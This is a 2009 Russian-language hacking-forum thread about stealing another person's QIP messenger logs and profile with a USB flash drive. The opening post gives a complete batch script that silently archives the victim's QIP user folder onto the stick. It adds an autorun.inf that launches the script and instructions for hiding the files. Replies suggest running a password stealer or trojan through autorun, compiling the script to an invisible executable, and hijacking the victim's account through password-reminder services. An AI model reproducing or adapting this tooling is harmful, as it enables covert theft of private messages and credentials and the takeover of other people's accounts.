Как с помощью USB Flash украсть логи QIP ?

Discussion in 'Песочница' started by L I G A, 26 Mar 2009.

  1. L I G A

    L I G A Banned

    Joined:
    27 Jul 2008
    Messages:
    482
    Likes Received:
    380
    Reputations:
    49
    [​IMG]

    Что для этого нужно?

    1 Создать файл zzz.bat с следующим текстом


    @Echo off
    c:
    chdir C:\Program Files\QIP\Users
    g:\rar.exe a -r users > nul
    copy users.rar g:\123 > nul
    del users.rar > nul



    где
    @Echo off.......скрывает визуальный процес копирования
    C:\Program Files\QIP\Users.......папка которую нада потянуть
    g:\rar.exe a -r users > nul.......запуск rar для ускорения копирования
    copy users.rar g:\123 > nul.......адрес куда тянем
    del users.rar > nul.......удаляет созданый архив

    если буква флеш диска не извесна можна нарисовать несколько вариантов

    @Echo off
    c:
    chdir C:\Program Files\QIP\Users
    e:\rar.exe a -r users > nul
    copy users.rar e:\123 > nul
    g:\rar.exe a -r users > nul
    copy users.rar g:\123 > nul
    h:\rar.exe a -r users > nul
    copy users.rar h:\123 > nul
    del users.rar > nul


    2 Создаем файл autorun.inf с текстом

    [autorun]
    ShellExeCute="zzz.bat"


    3 Копируем rar.exe (1файлик а не всю папку) из папки Program Files\WinRAR


    4 Создаем папку с названием 123


    5 Поместить это все 4 файла в корень флешки и сделать скрытыми.


    PS: Эфективно ворует мелкие файлы потому как это почти не заметно происходит.
    А вот с большыми врятли получится , при архивировании слишком уж долго висит консоль.
    Буду рад если кому пригодится


    источник:http://qiq.ru/26/03/2009/information/116842/kak_s_pomoschju_usb_flash_ukrast_logi_qip.html

    PS:По моему интересный способ.


    =============================================================
    Для тех у кого путь логов теперь тут C:\Documents and Settings\Admin\ApplicationData\QIP\Profiles:



    @Echo off
    c:
    chdir C:\Documents and Settings\Admin\ApplicationData\QIP\Profiles
    g:\rar.exe a -r users > nul
    copy Profiles.rar g:\123 > nul
    del Profiles.rar > nul


    видео
     
    #1 L I G A, 26 Mar 2009
    Last edited: 28 Mar 2009
    3 people like this.
  2. Dr.Gonzo

    Dr.Gonzo Member

    Joined:
    26 Feb 2009
    Messages:
    29
    Likes Received:
    9
    Reputations:
    5
    Лучше автораном запустить какую-нибудь прогу, ворующую пароли (помню были такие, которые через командную строку работали и сохраняли все пассы в файл) или, уж что там мелочиться, троян сразу.
    Есть один досадный недочет, который опытный пользователь сразу обнаружит: по клику на диске запустится бат файл, но сам диск не откроется, хоть ты закликайся.
    Ну и еще одно но - пользователи TotalCommander'a пролетают...
     
    1 person likes this.
  3. L I G A

    L I G A Banned

    Joined:
    27 Jul 2008
    Messages:
    482
    Likes Received:
    380
    Reputations:
    49
    Антивирус ругаться начнет.
     
    1 person likes this.
  4. HellXi

    HellXi Member

    Joined:
    18 Nov 2008
    Messages:
    74
    Likes Received:
    17
    Reputations:
    0
    баяяян !! низнаю какой давности....
    и что ты этим добьёшься ?! ровным щётом НИЧЕГО, так как логи как правило зашифрованы
    и это кстатии для 2005 кипа... Infium держит логи в другом месте
     
    #4 HellXi, 26 Mar 2009
    Last edited: 26 Mar 2009
    1 person likes this.
  5. L I G A

    L I G A Banned

    Joined:
    27 Jul 2008
    Messages:
    482
    Likes Received:
    380
    Reputations:
    49
    стащю папку юзверс себе на машину ,и зайду в квип через его учетку,единственное что я не смогу - узнать пасс,в файле config.ini потому что квип постоянно меняет алгоритм шифрования.Но его можно узнать зайдя через эту учетку и ввести в данные свой email адрес, а потом воспользоваться системой напоминания пароля на соответствующих официальных сайтах icq или aim.
     
    #5 L I G A, 26 Mar 2009
    Last edited: 26 Mar 2009
  6. LAGOX

    LAGOX New Member

    Joined:
    13 Feb 2009
    Messages:
    22
    Likes Received:
    2
    Reputations:
    -1
    зачем изврат, если есть доступ к компу, идешь и воруешь логи в наглую, желательно без палева:D
     
  7. Fooog

    Fooog Elder - Старейшина

    Joined:
    19 Sep 2008
    Messages:
    307
    Likes Received:
    170
    Reputations:
    12
    ТС! Это действительно было на ачате! Кажется не в разделе аси а в статьях (точно я не помню). Ссылку я сейчс на тему искать не буду... но если хочешь то найду ;)
     
  8. Sn@k3

    Sn@k3 Elder - Старейшина

    Joined:
    13 Apr 2006
    Messages:
    1,000
    Likes Received:
    438
    Reputations:
    90
    путь логов теперь тут
    C:\Documents and Settings\Admin\Application Data\QIP\Profiles
     
  9. L I G A

    L I G A Banned

    Joined:
    27 Jul 2008
    Messages:
    482
    Likes Received:
    380
    Reputations:
    49
    из-за частых вопросов снял видео.
     
  10. Roston

    Roston Elder - Старейшина

    Joined:
    31 Jul 2008
    Messages:
    337
    Likes Received:
    104
    Reputations:
    8
    согласен... бантик самое лучшее средство... я так хистори с асекю тырю.... пишеш 5 строк... зато доволен во всю=)
     
  11. Volkodav88

    Volkodav88 New Member

    Joined:
    2 Jan 2009
    Messages:
    0
    Likes Received:
    0
    Reputations:
    0
    На dump регестрацию требует!
     
  12. L I G A

    L I G A Banned

    Joined:
    27 Jul 2008
    Messages:
    482
    Likes Received:
    380
    Reputations:
    49
    регистрация - такая большая трабла?
     
  13. marchello

    marchello New Member

    Joined:
    16 Apr 2009
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    а что делать если логи хранятся не в Admin а в неизвестном пользователе?
     
  14. marchello

    marchello New Member

    Joined:
    16 Apr 2009
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    можно ли сделать так чтоб флешка сама находила на компе расположение нужного файла, папки?
     
  15. gri.n

    gri.n New Member

    Joined:
    12 Nov 2008
    Messages:
    124
    Likes Received:
    4
    Reputations:
    0
    это всё правильно но чтоб окно не висело надо бат компилить в exe в режиме невидимости ..тогда никто не заметит происходящих процессов !
     
  16. RumShun

    RumShun Member

    Joined:
    27 Oct 2008
    Messages:
    283
    Likes Received:
    75
    Reputations:
    6
    Прожку можно написать например на делфи, сделать ее невидимой и все, впринципе ничего сложного
     
  17. Kotovas

    Kotovas New Member

    Joined:
    13 Jun 2008
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    Пробел

    А если путь к файлу содержит пробелы? Например, папка Program files. bat - файл же может работать некорректно.
    Так как юзверя обычно ставят систему на пустой диск, где больше нет папок с именем program, я лично всегда указываю путь таким образом.

    Copy c:\progra~1\***\*** G:\123
     
    #17 Kotovas, 3 May 2009
    Last edited: 3 May 2009
  18. X-3

    X-3 Member

    Joined:
    28 Mar 2009
    Messages:
    306
    Likes Received:
    58
    Reputations:
    -2
    Bat-файл спокойно может работать с длинными именами папок.
     
  19. root_sashok

    root_sashok Elder - Старейшина

    Joined:
    4 Aug 2008
    Messages:
    389
    Likes Received:
    573
    Reputations:
    102
    тупой способ конечно, но эффективный
     
  20. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    1,997
    Likes Received:
    996
    Reputations:
    155
    Kotovas, ух ты! А кавычки для чего?
     
Loading...